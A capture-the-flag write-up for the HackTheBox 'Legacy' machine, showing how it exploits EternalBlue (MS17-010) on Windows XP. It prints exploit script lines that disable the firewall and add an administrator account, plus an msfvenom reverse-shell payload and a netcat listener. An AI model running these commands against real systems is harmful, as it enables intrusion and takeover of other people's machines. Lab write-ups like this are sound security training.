HTB: Legacy

Summary

Legacy is one of the easiest boxes from HackTheBox. It is vulnerable to EternalBlue (MS17-010) and is running Windows XP. You can use a public exploit that will provide you with a System Shell.

Discovery

Started off by running NmapAutomator.
Nmap discovered the following open ports and services:

PORT    STATE SERVICE      VERSION
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds

The automated nmap script discovered a potential vulnerability for EternalBlue:

| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           

Exploitation

Method 1: RDP instead of reverse shell

There are several exploits for this, however, you need to ensure that they are targeting Windows XP. This script does. Let’s dive a bit deeper into the script:

	smb_send_file(smbConn, lfile, 'C', '/%s' % filename)
	service_exec(conn, r'cmd /c c:\%s' % filename)

It will send the executable you supply and then execute it. If, for some reason, a reverse shell isn’t working, you can always modify this script to something like this:

service_exec(conn, r'cmd /c netsh advfirewall set allprofiles state off') 
service_exec(conn, r'cmd /c net user banaan pass /add')
service_exec(conn, r'cmd /c net localgroup administrators banaan /add')

This will add a new user and add the user to the administrators group. After this you can run:
xfreerdp /u:banaan +clipboard /v:10.11.1.75:3389
This will give you a RDP session as System.

Method 2: Reverse Shell

Before running the script you need to supply an executable, this was generated with MSFvenom:
msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=4444 EXITFUNC=thread -f exe -a x86 --platform windows -o rev.exe
The script can then be run as follows:
python2.7 send_and_execute.py 10.129.5.63 rev.exe
Make sure to have a netcat listener ready on port 4444 and you will receive a system shell.

Conclusion

This was probably one of the easiest boxes from HackTheBox and very straightforward. Hope you enjoyed this writeup!